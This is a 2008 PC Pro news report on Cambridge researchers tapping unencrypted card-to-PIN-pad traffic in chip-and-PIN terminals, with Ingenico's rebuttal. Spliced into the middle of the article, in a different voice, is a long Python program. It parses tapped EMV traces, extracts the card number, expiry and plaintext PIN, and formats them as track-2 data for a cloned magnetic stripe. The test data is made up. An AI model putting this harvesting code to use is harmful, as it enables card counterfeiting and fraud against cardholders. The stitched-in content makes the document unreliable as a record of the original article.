Cambridge team hijacks chip and PIN
Posted on 28 Feb 2008 at 12:01
Researchers at Cambridge University have discovered a simple method of capturing data from chip and PIN payment cards.
The team of Saar Drimer, Steven J Murdoch and Ross Anderson found the vulnerability in two common PIN entry devices (PEDs), the small card-reading terminals at shop checkouts. By inserting a simple data-tapping circuit into the PED, the researchers were able to read the unencrypted data that passed between the card and the reader.
They successfully demonstrated the exploit on a real terminal borrowed from a retailer.
"These PEDs failed to protect the communication path that carries the card data from the card to the PIN pad, and that carries the PIN from the PIN pad back to the card," says Drimer. "A villain who taps this gets all the information he needs to make a fake card, and to use it."
The stolen PIN and card data could be copied to the magnetic stripes of counterfeit cards, which could then be used in overseas ATMs or any other device that does not yet use chip technology.
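The article does not spell out the wire format the tap recorded. As an added illustration (not the researchers' code or anything from the page), the Python below parses a constructed card-to-PED APDU trace in the standard EMV/ISO 7816 form: a READ RECORD response carrying tag 57 (track-2-equivalent data) and a VERIFY command carrying a plaintext format-2 PIN block. The PAN, expiry and PIN in the traces are made up, and the enciphered-PIN trace uses filler bytes in place of real RSA ciphertext. It shows concretely why a passive tap on an unencrypted channel yields "all the information he needs", and for contrast what the same tap gets when the PIN is enciphered to the card instead.

```python
# Added example, not code from the researchers or the article: parse a
# constructed card<->PED APDU trace and recover what a passive tap yields.
# Wire format assumed is standard EMV/ISO 7816: READ RECORD (INS B2)
# responses with tag 57 (track-2-equivalent data) inside template 70, and
# VERIFY (INS 20) with P2=80 (plaintext format-2 PIN block) or P2=88
# (PIN enciphered to the card's public key).
from dataclasses import dataclass
from typing import Optional


def parse_tlv(data: bytes) -> dict:
    """Minimal BER-TLV parser (EMV subset): {tag_hex: value_bytes}, recursing
    into constructed templates such as 70 so nested tags surface at top level."""
    out, i = {}, 0
    while i < len(data):
        if data[i] in (0x00, 0xFF):          # padding bytes between objects
            i += 1
            continue
        start = i
        constructed = bool(data[i] & 0x20)
        if data[i] & 0x1F == 0x1F:          # multi-byte tag (e.g. 5F24, 9F36)
            i += 1
            while data[i] & 0x80:
                i += 1
        i += 1
        tag = data[start:i].hex().upper()
        length = data[i]
        i += 1
        if length & 0x80:                   # long-form length
            n = length & 0x7F
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        value = data[i:i + length]
        i += length
        if constructed:
            out.update(parse_tlv(value))
        else:
            out[tag] = value
    return out


def parse_track2(value: bytes) -> dict:
    """Decode tag 57: PAN, 'D' separator, expiry YYMM, service code, rest.
    This is the magnetic stripe's track 2 with 'D' standing in for '='."""
    digits = value.hex().upper().rstrip("F")
    pan, _, tail = digits.partition("D")
    return {"pan": pan, "expiry": tail[:4], "service_code": tail[4:7],
            "discretionary": tail[7:]}


def parse_plaintext_pin(pin_block: bytes) -> Optional[str]:
    """Decode an ISO 9564 format-2 PIN block (EMV plaintext offline PIN):
    nibble 0x2, PIN length nibble, PIN digits, 0xF padding to 8 bytes."""
    nib = pin_block.hex().upper()
    if len(pin_block) != 8 or nib[0] != "2":
        return None
    length = int(nib[1], 16)
    if not 4 <= length <= 12:
        return None
    return nib[2:2 + length]


@dataclass
class TapResult:
    pan: str = ""
    expiry: str = ""
    service_code: str = ""
    discretionary: str = ""
    pin: Optional[str] = None
    pin_mode: str = "none"                   # "plaintext", "enciphered", "none"


def harvest(trace) -> TapResult:
    """Walk (command_hex, response_hex) pairs exactly as a tap on the card/PED
    line sees them and pull out everything needed for a counterfeit stripe."""
    r = TapResult()
    for cmd_hex, rsp_hex in trace:
        cmd, rsp = bytes.fromhex(cmd_hex), bytes.fromhex(rsp_hex)
        ins, p2 = cmd[1], cmd[3]
        if ins == 0x20:                      # VERIFY
            if p2 == 0x80:                   # plaintext PIN block in clear
                r.pin = parse_plaintext_pin(cmd[5:5 + cmd[4]])
                r.pin_mode = "plaintext"
            elif p2 == 0x88:                 # RSA ciphertext: tap learns nothing
                r.pin_mode = "enciphered"
        if rsp[-2:] == b"\x90\x00":          # SW 9000: card answered OK
            tlv = parse_tlv(rsp[:-2])
            if "57" in tlv:
                t2 = parse_track2(tlv["57"])
                r.pan, r.expiry = t2["pan"], t2["expiry"]
                r.service_code, r.discretionary = t2["service_code"], t2["discretionary"]
    return r


def track2_string(r: TapResult) -> str:
    """Captured data re-expressed as ISO 7813 track 2 (sentinels ';' and '?',
    '=' separator, LRC omitted), i.e. what gets written to a cloned stripe."""
    return f";{r.pan}={r.expiry}{r.service_code}{r.discretionary}?"


# Constructed traces (made-up PAN 4111..., expiry 10/12, PIN 1234).
PLAINTEXT_TRACE = [
    # READ RECORD SFI 2 record 1 -> template 70 holding tag 57
    ("00B2011400", "7012" "5710" "4111111111111111D10122010000000F" "9000"),
    # VERIFY, P2=80: PIN block 24 12 34 FF FF FF FF FF -> PIN 1234 in clear
    ("0020008008241234FFFFFFFFFF", "9000"),
]
ENCIPHERED_TRACE = [
    ("00B2011400", "7012" "5710" "4111111111111111D10122010000000F" "9000"),
    # VERIFY, P2=88: 128-byte filler stands in for the RSA-enciphered PIN
    ("0020008880" + "A5" * 0x80, "9000"),
]

if __name__ == "__main__":
    for name, trace in (("plaintext", PLAINTEXT_TRACE), ("enciphered", ENCIPHERED_TRACE)):
        res = harvest(trace)
        print(name, res, "->", track2_string(res))
```

Note that the card data (tag 57) is recoverable from the tap in both traces; only the PIN differs. Enciphered offline PIN (VERIFY with P2=88) was already defined by EMV, so a tapped channel leaks the PIN only when the terminal and card negotiate plaintext verification; the cloned stripe itself is usable wherever magnetic-stripe fallback remains, exactly as the article describes.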
Ingenico, which manufactures one of the PEDs identified by the researchers, said the risk had been exaggerated.
"Retailers and card users should rest assured that the devices, from various suppliers, identified by the Cambridge University scientists, remain among the most secure terminals on the market and have contributed to card fraud at UK retailers falling by up to 47% year-on-year," the company claims in a statement.
The UK payments association APACS declined to comment until it had seen full details of the researchers' findings, which for security reasons have not been made public.
And the researchers warned that the risk may not be confined to PEDs.
"The lessons we learned are not limited to banking," says Anderson, who is professor of security engineering at Cambridge. "Other fields, from voting machines to electronic medical record systems, suffer from the same combination of stupid mistakes, sham evaluations and obstructive authorities.
"Where the public are forced to rely on the security of a system, we need honest security evaluations that are published and subjected to peer review."
Author: Simon Aughton
Printed from www.pcpro.co.uk